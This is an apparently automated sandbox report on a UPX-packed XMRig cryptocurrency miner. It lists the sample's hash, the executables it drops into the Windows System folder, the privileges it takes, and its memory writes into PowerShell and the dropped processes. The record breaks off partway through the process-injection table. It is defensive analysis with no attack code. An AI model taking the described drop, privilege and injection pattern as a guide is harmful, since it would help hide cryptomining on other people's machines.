Malware Analysis Report

2024-11-16 10:59

Sample ID 240614-hlvz5asfrq
Target aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe
SHA256 3c0d28b81a10612638ae1eb1c39fbfa645982775c5653681c342a155a95d8bce
Tags
upx miner xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3c0d28b81a10612638ae1eb1c39fbfa645982775c5653681c342a155a95d8bce

Threat Level: Known bad

The file aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

xmrig

XMRig Miner payload

Xmrig family

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

UPX packed file

Loads dropped DLL

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-14 06:49

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-14 06:49

Reported

2024-06-14 06:52

Platform

win7-20240611-en

Max time kernel

150s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\NlgCNPq.exe N/A
N/A N/A C:\Windows\System\ShhklzO.exe N/A
N/A N/A C:\Windows\System\XvdQebu.exe N/A
N/A N/A C:\Windows\System\Mhjgxzm.exe N/A
N/A N/A C:\Windows\System\bmvEBsT.exe N/A
N/A N/A C:\Windows\System\ajKlAqP.exe N/A
N/A N/A C:\Windows\System\UXyYTln.exe N/A
N/A N/A C:\Windows\System\VCSHQqH.exe N/A
N/A N/A C:\Windows\System\daGDcMk.exe N/A
N/A N/A C:\Windows\System\kwrCXhu.exe N/A
N/A N/A C:\Windows\System\cflYcvJ.exe N/A
N/A N/A C:\Windows\System\BTzOJlq.exe N/A
N/A N/A C:\Windows\System\JhEINBq.exe N/A
N/A N/A C:\Windows\System\DSUGdFM.exe N/A
N/A N/A C:\Windows\System\PgHCagB.exe N/A
N/A N/A C:\Windows\System\hbENexV.exe N/A
N/A N/A C:\Windows\System\dzxPdXY.exe N/A
N/A N/A C:\Windows\System\KSmpXXG.exe N/A
N/A N/A C:\Windows\System\omwhhut.exe N/A
N/A N/A C:\Windows\System\tHCaKut.exe N/A
N/A N/A C:\Windows\System\oNLzwTr.exe N/A
N/A N/A C:\Windows\System\aytEyyB.exe N/A
N/A N/A C:\Windows\System\SoYVwkK.exe N/A
N/A N/A C:\Windows\System\pbIuqss.exe N/A
N/A N/A C:\Windows\System\kpUBkjW.exe N/A
N/A N/A C:\Windows\System\jwlejST.exe N/A
N/A N/A C:\Windows\System\EUwRvBb.exe N/A
N/A N/A C:\Windows\System\GPYydnB.exe N/A
N/A N/A C:\Windows\System\WZVmHOR.exe N/A
N/A N/A C:\Windows\System\yCzRqRJ.exe N/A
N/A N/A C:\Windows\System\XjFLIzq.exe N/A
N/A N/A C:\Windows\System\gralLCl.exe N/A
N/A N/A C:\Windows\System\jVgGGJw.exe N/A
N/A N/A C:\Windows\System\blTqtUH.exe N/A
N/A N/A C:\Windows\System\BVUxEct.exe N/A
N/A N/A C:\Windows\System\PgOetud.exe N/A
N/A N/A C:\Windows\System\YKgWHYX.exe N/A
N/A N/A C:\Windows\System\WYxMrhv.exe N/A
N/A N/A C:\Windows\System\TizSLFU.exe N/A
N/A N/A C:\Windows\System\pxnJtCg.exe N/A
N/A N/A C:\Windows\System\NChKRKs.exe N/A
N/A N/A C:\Windows\System\YVBYTTJ.exe N/A
N/A N/A C:\Windows\System\AMXTKmC.exe N/A
N/A N/A C:\Windows\System\snQQFOC.exe N/A
N/A N/A C:\Windows\System\SLoByxK.exe N/A
N/A N/A C:\Windows\System\nmWWNlF.exe N/A
N/A N/A C:\Windows\System\NpgjExS.exe N/A
N/A N/A C:\Windows\System\zZmrtxU.exe N/A
N/A N/A C:\Windows\System\vaiSBIY.exe N/A
N/A N/A C:\Windows\System\vZKyuwS.exe N/A
N/A N/A C:\Windows\System\czGedRw.exe N/A
N/A N/A C:\Windows\System\NAxqhFt.exe N/A
N/A N/A C:\Windows\System\EgmXNJl.exe N/A
N/A N/A C:\Windows\System\EdeXjwe.exe N/A
N/A N/A C:\Windows\System\fpsccKE.exe N/A
N/A N/A C:\Windows\System\vFyGNuz.exe N/A
N/A N/A C:\Windows\System\niudbtf.exe N/A
N/A N/A C:\Windows\System\lncnuNa.exe N/A
N/A N/A C:\Windows\System\WYGbnUA.exe N/A
N/A N/A C:\Windows\System\jDFqIQI.exe N/A
N/A N/A C:\Windows\System\NQoGkix.exe N/A
N/A N/A C:\Windows\System\gEOXTSU.exe N/A
N/A N/A C:\Windows\System\GIDvWCA.exe N/A
N/A N/A C:\Windows\System\ooaMItD.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\xoPGsTU.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\syZZQif.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\RQFDIje.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\FVuTsgU.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\BxfllzI.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\XObFcrP.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\SIBtgdc.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\uRcIEdY.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\munTpQD.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\fDFRhtr.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\pwwiyAH.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\mRjVQbK.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\NChKRKs.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\XQJHPrT.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\NOHDAOL.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\cflYcvJ.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\xQwTQqS.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\svGwthv.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\jKueOus.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\RLNFkBM.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\XjFLIzq.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\RCmCRni.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\HIKpTqb.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\bnwuItg.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\LNczDTd.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZafBYup.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\GMCNAHV.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\TjQlsBz.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\lQSoQuw.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\qhqhtIJ.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\bQBIRBL.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\OwexauY.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\xmSypld.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\aWLkeed.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\uvtUsPK.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\rGMGDUa.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\dHdJzME.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\VbqKjtd.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\FukOVFA.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\wCiHVXj.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\rYRFjlz.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\ijfUPwT.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\RYyAfGJ.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\JXQCbfW.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\BTzOJlq.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\OstxEpB.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\vroqiQQ.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\wLsIFnH.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\JMAQOCX.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\KgmvcGH.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\vcOSGfm.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\QPicoxH.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\xMwVnHb.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\iokxcoY.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\TZBNGwB.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\detEiaI.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\eKXKCcK.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\yNsFPPX.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\trDJKRa.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\AAhuLKA.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\uIVurca.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\kwrCXhu.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\siuCGxY.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\xClpZuR.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2212 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2212 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2212 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2212 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\NlgCNPq.exe
PID 2212 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\NlgCNPq.exe
PID 2212 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\NlgCNPq.exe
PID 2212 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\ShhklzO.exe
